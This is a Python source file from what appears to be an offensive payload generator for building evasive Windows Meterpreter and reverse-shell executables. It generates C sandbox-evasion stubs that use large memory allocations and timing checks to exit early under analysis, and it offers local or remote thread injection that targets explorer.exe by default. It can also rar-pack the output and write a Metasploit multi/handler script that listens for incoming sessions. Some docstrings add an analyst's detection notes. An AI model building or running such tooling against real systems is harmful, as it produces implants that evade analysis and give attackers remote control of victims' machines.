def Windows_Staged_Or_No():
    """Show the Windows staged/stageless menu and dispatch on the answer.

    "1" opens the staged menu, "2" the stageless menu, "0" returns to
    Modules(). Any other answer calls core.Bad_Choice() and prompts again.
    Ctrl-C at any point is routed to core.Exit_Program().
    """
    try:
        core.Windows_Method_Choice()
        while True:
            selection = core.core_input()
            if selection == "1":
                Advanced_Windows_Staged_Meterpreter()
                break
            if selection == "2":
                Advanced_Windows_Stageless_Meterpreter()
                break
            if selection == "0":
                Modules()
                break
            # Unrecognised answer: report it and ask again.
            core.Bad_Choice()
    except KeyboardInterrupt:
        core.Exit_Program()
def Advanced_Windows_Staged_Meterpreter():
    """Show the architecture menu for the staged Windows path.

    "1" selects AWSM_x86(), "2" selects AWSM_x64(), "0" goes back to
    Windows_Staged_Or_No(). Any other answer calls core.Bad_Choice() and
    prompts again. Ctrl-C is routed to core.Exit_Program().
    """
    try:
        core.Windows_Arch_Choice()
        while True:
            selection = core.core_input()
            if selection == "1":
                AWSM_x86()
                break
            if selection == "2":
                AWSM_x64()
                break
            if selection == "0":
                Windows_Staged_Or_No()
                break
            # Unrecognised answer: report it and ask again.
            core.Bad_Choice()
    except KeyboardInterrupt:
        core.Exit_Program()
def Modules():
    """Show the top-level module menu.

    "1" opens Windows_Staged_Or_No(), "0" calls core.Exit_Program(). Any
    other answer calls core.Bad_Choice() and prompts again. Ctrl-C is
    routed to core.Exit_Program().
    """
    try:
        core.Module_Choice()
        while True:
            selection = core.core_input()
            if selection == "1":
                Windows_Staged_Or_No()
                break
            if selection == "0":
                core.Exit_Program()
                break
            # Unrecognised answer: report it and ask again.
            core.Bad_Choice()
    except KeyboardInterrupt:
        core.Exit_Program()
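def Decoil():
    """Prompt for a stub count and return that many C "decoil" stubs as text.

    Each stub, exactly as emitted below, declares a char pointer, mallocs
    300000000 bytes, zero-fills the buffer when the allocation succeeded,
    reads GetTickCount(), calls Sleep(1000), reads GetTickCount() again,
    calls exit(0) when the measured difference is under 1000, and finally
    frees the buffer. The three identifiers per stub come from
    gen.Varname_Creator().

    For analysts: this is a time-based sandbox check (MITRE ATT&CK
    T1497.003). The fixed constants in the emitted text -- the
    300000000-byte allocation and the Sleep(1000) bracketed by two
    GetTickCount() reads with an early exit(0) -- stay the same while the
    variable names change, so they are the stable features to match on.

    Returns:
        The concatenated C source, or "" when the prompt is answered with
        ENTER or with a count of zero or less.

    Raises:
        ValueError: the answer is neither blank nor an integer.
    """
    print("""
    |------------------------------------------------------------|
    |HARD MEMORY ALLOCATION                                      |
    |------------------------------------------------------------|
    Please enter the number of decoil to add (unlimited).
    PS : 1 decoil = 1 secondes to sleep.
    Press ENTER for ignore this step.
    """)
    Raw_Count = core.core_input().strip()
    # The prompt promises that ENTER skips this step; int("") would raise.
    if not Raw_Count:
        return ""
    Decoil_Total = int(Raw_Count)

    Stubs = []
    # range() yields nothing for a negative count, where the previous
    # count-up-until-equal loop never terminated.
    for _ in range(Decoil_Total):
        # Same call order as before: buffer name, then the two tick names.
        Memdmp1 = gen.Varname_Creator()
        Tac1 = gen.Varname_Creator()
        Tick1 = gen.Varname_Creator()
        Stubs.append("char * " + Memdmp1 + "= NULL;")
        Stubs.append(Memdmp1 + " = (char *)malloc(300000000);")
        Stubs.append("if (" + Memdmp1 + " != NULL) {")
        Stubs.append("memset(" + Memdmp1 + ", 00, 300000000);}")
        Stubs.append("int " + Tick1 + " = GetTickCount();")
        Stubs.append("Sleep(1000);")
        Stubs.append("int " + Tac1 + " = GetTickCount();")
        Stubs.append("if ((" + Tac1 + " - " + Tick1 + ") < 1000) {exit(0);}")
        Stubs.append("free(" + Memdmp1 + ");")
    return "".join(Stubs)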
def Add_Icon():
    """Ask for an icon file name and return the answer unchanged.

    The banner tells the user to place .ico files in the "icon" folder and
    to press ENTER when there is none; in that case the value returned is
    whatever core.core_input() gives for an empty answer.
    """
    print("""
    |------------------------------------------------------------|
    |In the "icon" folder, put your icon files in it.            |
    |To specify an icon file, write as follows: my_icon_name.ico |
    |Press "ENTER" if you do not have an icon.                   |
    |------------------------------------------------------------|
    \n""")
    return core.core_input()
def Local_Or_Remote():
    """Ask which thread-injection variant to use and return its result.

    Only the answer "2" selects the remote variant. Every other answer,
    including "1" and an empty one, selects the local variant. For the
    remote variant a second prompt asks for a process name; an empty
    answer falls back to "explorer.exe".

    Returns:
        Whatever End_Local_Thread_Injection() or
        End_Remote_Thread_Injection(name) returns. Both are defined
        elsewhere; presumably the generated source for that variant --
        confirm against those functions.
    """
    print("""
    |---------------------------------------|
    | [1] Local Thread Injection (DEFAULT); |
    | [2] Remote Thread Injection;          |
    |---------------------------------------|
    """)
    mode = core.core_input()
    if mode != "2":
        return End_Local_Thread_Injection()

    print("""
    |-----------------------------------------------------|
    | Which process to inject ? (DEFAULT = explorer.exe); |
    |-----------------------------------------------------|
    """)
    target_name = core.core_input()
    if target_name == "":
        target_name = "explorer.exe"
    return End_Remote_Thread_Injection(target_name)
def AWM_x64():
    """Show the x64 stageless menu and run the chosen module's Construction().

    "1" to "4" select the reverse TCP, HTTP and HTTPS Meterpreter modules
    and the reverse TCP shell module, in that order. "0" goes back. Any
    other answer calls core.Bad_Choice() and prompts again. Ctrl-C is
    routed to core.Exit_Program().
    """
    try:
        core.x64_Windows_Stageless_Choice()
        while True:
            selection = core.core_input()
            if selection == "1":
                x64_Stageless_Win_Meterpreter_Rev_Tcp.Construction()
                break
            if selection == "2":
                x64_Stageless_Win_Meterpreter_Rev_Http.Construction()
                break
            if selection == "3":
                x64_Stageless_Win_Meterpreter_Rev_Https.Construction()
                break
            if selection == "4":
                x64_Stageless_Win_Shell_Rev_Tcp.Construction()
                break
            if selection == "0":
                # NOTE(review): this is the stageless menu, yet "back"
                # opens the staged architecture menu -- confirm the
                # intended parent.
                Advanced_Windows_Staged_Meterpreter()
                break
            # Unrecognised answer: report it and ask again.
            core.Bad_Choice()
    except KeyboardInterrupt:
        core.Exit_Program()
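def Compress_Rar(FILENAME):
    """Optionally pack the generated EXE into a .rar archive inside output/.

    Args:
        FILENAME: path of the generated executable. The 'output/' prefix
            is stripped before the name is handed to rar, and '.exe' is
            replaced by '.rar' to form the archive name.

    Only the answer "1" triggers compression; any other answer returns
    without doing anything. The archive is created with
    `rar a -m5 <archive> <file>`, run with output/ as its working
    directory.
    """
    print("""
    |--------------------------------|
    | Compress EXE to rar archive ?  |
    | [0] Nope;                      |
    | [1] Yeah;                      |
    |--------------------------------|
    """)
    CR = core.core_input()
    if CR != "1":
        return

    print(core.amcolors.OCRA + core.amcolors.BOLD + "[*] Compression"
          + core.amcolors.ENDC)
    ARCHIVE = FILENAME.replace('.exe', '.rar').replace('output/', '')
    TARGET = FILENAME.replace('output/', '')
    COMPRESS = ['rar', 'a', '-m5', ARCHIVE, TARGET]
    try:
        # cwd= confines the directory change to the child process. The
        # previous os.chdir("output/") was never undone, so every later
        # relative path (and a second call to this function) resolved
        # inside output/.
        RESULT = subprocess.run(COMPRESS, shell=False,
                                stdout=subprocess.PIPE, cwd="output/")
    except FileNotFoundError:
        # Raised when the rar binary or the output/ directory is missing.
        print(core.amcolors.OCRA + core.amcolors.BOLD
              + "[-] Compression failed: rar or output/ not found"
              + core.amcolors.ENDC)
        return
    if RESULT.returncode != 0:
        # Do not report success when rar itself reported an error.
        print(core.amcolors.OCRA + core.amcolors.BOLD
              + "[-] Compression failed" + core.amcolors.ENDC)
        return
    print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] Compressed"
          + core.amcolors.ENDC)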
def Run_Meterpreter_Script(ARCH, PLATFORM, RC_PAYLOAD, LHOST, LPORT, TYPE):
    """Optionally write a multi/handler resource script and open msfconsole.

    Args:
        ARCH: "x64" or "x86"; any other value makes the call a no-op.
        PLATFORM: only "Windows" is handled.
        RC_PAYLOAD: payload name written after "set payload ".
        LHOST: listener host; a leading 'LHOST=' marker is removed.
        LPORT: listener port; a leading 'LPORT=' marker is removed.
        TYPE: "Meterpreter" adds the stage-encoding options, "Shell" omits
            them; any other value makes the call a no-op.

    Only the answer "1" does anything. The script is written to
    AccessMe_To_Msf.rc in the current directory, msfconsole is started in
    a new gnome-terminal window, and after a fixed 12-second wait the
    file is removed with `rm`.

    NOTE(review): RC_PAYLOAD, LHOST and LPORT are concatenated into the
    resource script without validation, so an embedded newline becomes an
    extra console command. Confirm the callers only pass checked values.
    """
    print("""
    |-----------------------------|
    | Run multi/handler script ?  |
    | [0] Nope;                   |
    | [1] Yeah;                   |
    |-----------------------------|
    """)
    RMS = core.core_input()
    if RMS != "1":
        return

    # The four original branches differed only in the Meterpreter-specific
    # options and the per-architecture encoder line.
    stage_encoder_line = {
        "x64": "set StageEncoder x64/xor_dynamic\n",
        "x86": "set StageEncoder x86/xor_dynamic\n",
    }
    if ARCH not in ("x64", "x86"):
        return
    if PLATFORM != "Windows":
        return
    if TYPE not in ("Meterpreter", "Shell"):
        return

    LHOST = LHOST.replace('LHOST=', '')
    LPORT = LPORT.replace('LPORT=', '')

    rc_parts = [
        "use exploit/multi/handler\n",
        "set payload " + RC_PAYLOAD + "\n",
        "set lhost " + LHOST + "\n",
        "set lport " + LPORT + "\n",
    ]
    if TYPE == "Meterpreter":
        rc_parts.append("set AutoLoadStdapi false\n")
        rc_parts.append("set AutoSystemInfo false\n")
        rc_parts.append("set EnableStageEncoding true\n")
        rc_parts.append(stage_encoder_line[ARCH])
    rc_parts.append("set ExitOnSession false\n")
    rc_parts.append("exploit -z")
    RC_Meterpreter = "".join(rc_parts)

    with open('AccessMe_To_Msf.rc', 'w') as f:
        f.write(RC_Meterpreter)
    os.system("gnome-terminal -e 'msfconsole -r AccessMe_To_Msf.rc'")
    core.Clear()
    print(core.amcolors.OCRA + core.amcolors.BOLD
          + "[*] Deletion of the RC file in 12 seconds" + core.amcolors.ENDC)
    # Fixed delay before the script is removed; nothing here checks that
    # msfconsole has finished reading it.
    time.sleep(12)
    RM_MSF_RC = ["rm", "AccessMe_To_Msf.rc"]
    subprocess.run(
        RM_MSF_RC, shell=False, stdout=subprocess.PIPE).stdout.decode('utf-8')
    print(core.amcolors.GREEN + core.amcolors.BOLD + "[+] RC file deleted."
          + core.amcolors.ENDC)